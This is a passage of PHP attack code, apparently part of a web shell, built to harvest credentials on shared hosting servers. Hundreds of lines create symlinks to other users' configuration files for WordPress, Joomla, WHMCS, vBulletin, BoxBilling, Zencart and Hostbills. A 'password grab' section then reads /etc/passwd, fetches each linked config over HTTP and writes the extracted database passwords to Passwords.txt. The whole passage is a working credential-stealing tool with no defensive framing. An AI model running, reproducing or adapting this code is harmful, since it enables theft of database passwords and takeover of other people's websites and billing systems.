  1896. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1897. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1898. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1899. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1900. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1901. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1902. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1903. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1904. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1905. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1906. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1907. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1908. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1909. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1910. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1911. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1912. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1913. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1914. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1915. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1916. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1917. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1918. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1919. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1920. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1921. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1922. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1923. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1924. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1925. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1926. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1927. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1928. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1929. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1930. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1931. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1932. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1933. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1934. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1935. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1936. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1937. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1938. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1939. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1940. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1941. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1942. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1943. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1944. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1945. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1946. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1947. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1948. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1949. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1950. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1951. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1952. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1953. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1954. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1955. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1956. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1957. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1958. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1959. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1960. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1961. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1962. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1963. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1964. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1965. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1966. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1967. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1968. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1969. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1970. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1971. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1972. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1973. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1974. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1975. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1976.  
  1977. //Home4
  1978.  
  1979. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1980. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1981. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1982. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1983. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1984. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1985. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1986. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1987. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1988. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1989. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1990. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1991. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1992. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1993. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1994. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1995. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1996. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1997. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1998. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1999. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2000. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2001. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2002. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2003. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2004. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2005. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2006. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2007. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2008. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2009. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2010. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2011. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2012. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2013. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2014. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2015. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2016. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2017. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2018. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2019. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2020. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2021. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2022. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2023. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2024. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2025. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2026. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2027. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2028. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2029. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2030. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2031. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2032. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2033. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2034. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2035. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2036. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2037. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2038. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2039. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2040. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2041. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2042. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2043. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2044. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2045. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2046. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2047. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2048. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2049. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2050. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2051. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2052. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2053. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2054. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2055. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2056. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2057. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2058. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2059. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2060. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2061. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2062. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2063. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2064. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2065. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2066. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2067. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2068. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2069. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2070. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2071. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2072. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2073. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2074. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2075. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2076. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2077. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2078. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2079. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2080. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2081. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2082. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2083. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2084. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2085. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2086. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2087. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2088. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2089. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2090. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2091. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2092. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2093. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2094. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2095. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2096. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2097. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2098. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2099. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2100. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2101. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2102. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2103. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2104. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2105. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2106. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2107. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2108. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2109. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2110. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2111. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2112. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2113. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2114. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2115. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2116. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2117. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2118. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2119. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2120. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2121. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2122. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2123. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2124. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2125. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2126. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2127. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2128. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2129. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2130. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2131. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2132. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2133. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2134. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2135. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2136. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2137. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2138. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2139. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2140. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2141. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2142. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2143. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2144. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2145. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2146. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2147. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2148. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2149. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2150. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2151. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2152. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2153. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2154. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2155. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2156. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2157. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2158. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2159.  
  2160. }
  2161.  
  2162. //password grab
  2163.  
  2164. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  2165. {
  2166.  
  2167. $ar0=explode($marqueurDebutLien, $text);
  2168. $ar1=explode($marqueurFinLien, $ar0[1]);
  2169. $ar=trim($ar1[0]);
  2170. return $ar;
  2171. }
  2172.  
  2173. $ffile=fopen('Passwords.txt','a+');
  2174.  
  2175.  
  2176. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/chonx_symconf/";
  2177. $re=$r;
  2178. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
  2179.  
  2180. $users=file("/etc/passwd");
  2181. foreach($users as $user)
  2182. {
  2183.  
  2184. $str=explode(":",$user);
  2185. $usersss=$str[0];
  2186. foreach($confi as $co)
  2187. {
  2188.  
  2189.  
  2190. $uurl=$re.$usersss.$co;
  2191. $uel=$uurl;
  2192.  
  2193. $ch = curl_init();
  2194.  
  2195. curl_setopt($ch, CURLOPT_URL, $uel);
  2196. curl_setopt($ch, CURLOPT_HEADER, 1);
  2197. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2198. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2199. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  2200. $result['EXE'] = curl_exec($ch);
  2201. curl_close($ch);
  2202. $uxl=$result['EXE'];
  2203.  
  2204.  
  2205. if($uxl && preg_match('/table_prefix/i',$uxl))
  2206. {
  2207.  
  2208. //Wordpress
  2209.  
  2210. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  2211. if(!empty($dbp))
  2212. $pass=$dbp."\n";
  2213. fwrite($ffile,$pass);
  2214.  
  2215. }
  2216. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  2217. {
  2218.  
  2219. //WHMCS
  2220.  
  2221. $dbp=entre2v2($uxl,"db_password = '","';");
  2222. if(!empty($dbp))
  2223. $pass=$dbp."\n";
  2224. fwrite($ffile,$pass);
  2225.  
  2226. }
  2227.  
  2228.  
  2229. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  2230. {
  2231.  
  2232. //Joomla
  2233.  
  2234. $db=entre2v2($uxl,"password = '","';");
  2235. if(!empty($db))
  2236. $pass=$db."\n";
  2237. fwrite($ffile,$pass);
  2238. }
  2239. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  2240. {
  2241.  
  2242. //Vbulletin
  2243.  
  2244. $db=entre2v2($uxl,"password'] = '","';");
  2245. if(!empty($db))
  2246. $pass=$db."\n";
  2247. fwrite($ffile,$pass);
  2248.  
  2249. }
  2250. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  2251. {
  2252.  
  2253. //Other
  2254.  
  2255. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  2256. if(!empty($db))
  2257. $pass=$db."\n";
  2258. fwrite($ffile,$pass);
  2259. }
  2260. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2261. {
  2262.  
  2263. //Other
  2264.  
  2265. $db=entre2v2($uxl,"dbpass = '","';");
  2266. if(!empty($db))
  2267. $pass=$db."\n";
  2268. fwrite($ffile,$pass);
  2269. }
  2270. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2271. {
  2272.  
  2273. //Other
  2274.  
  2275. $db=entre2v2($uxl,"dbpass = '","';");
  2276. if(!empty($db))
  2277. $pass=$db."\n";
  2278. fwrite($ffile,$pass);
  2279.  
  2280. }
  2281. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2282. {
  2283.  
  2284. //Other
  2285.  
  2286. $db=entre2v2($uxl,"dbpass = \"","\";");
  2287. if(!empty($db))
  2288. $pass=$db."\n";
  2289. fwrite($ffile,$pass);
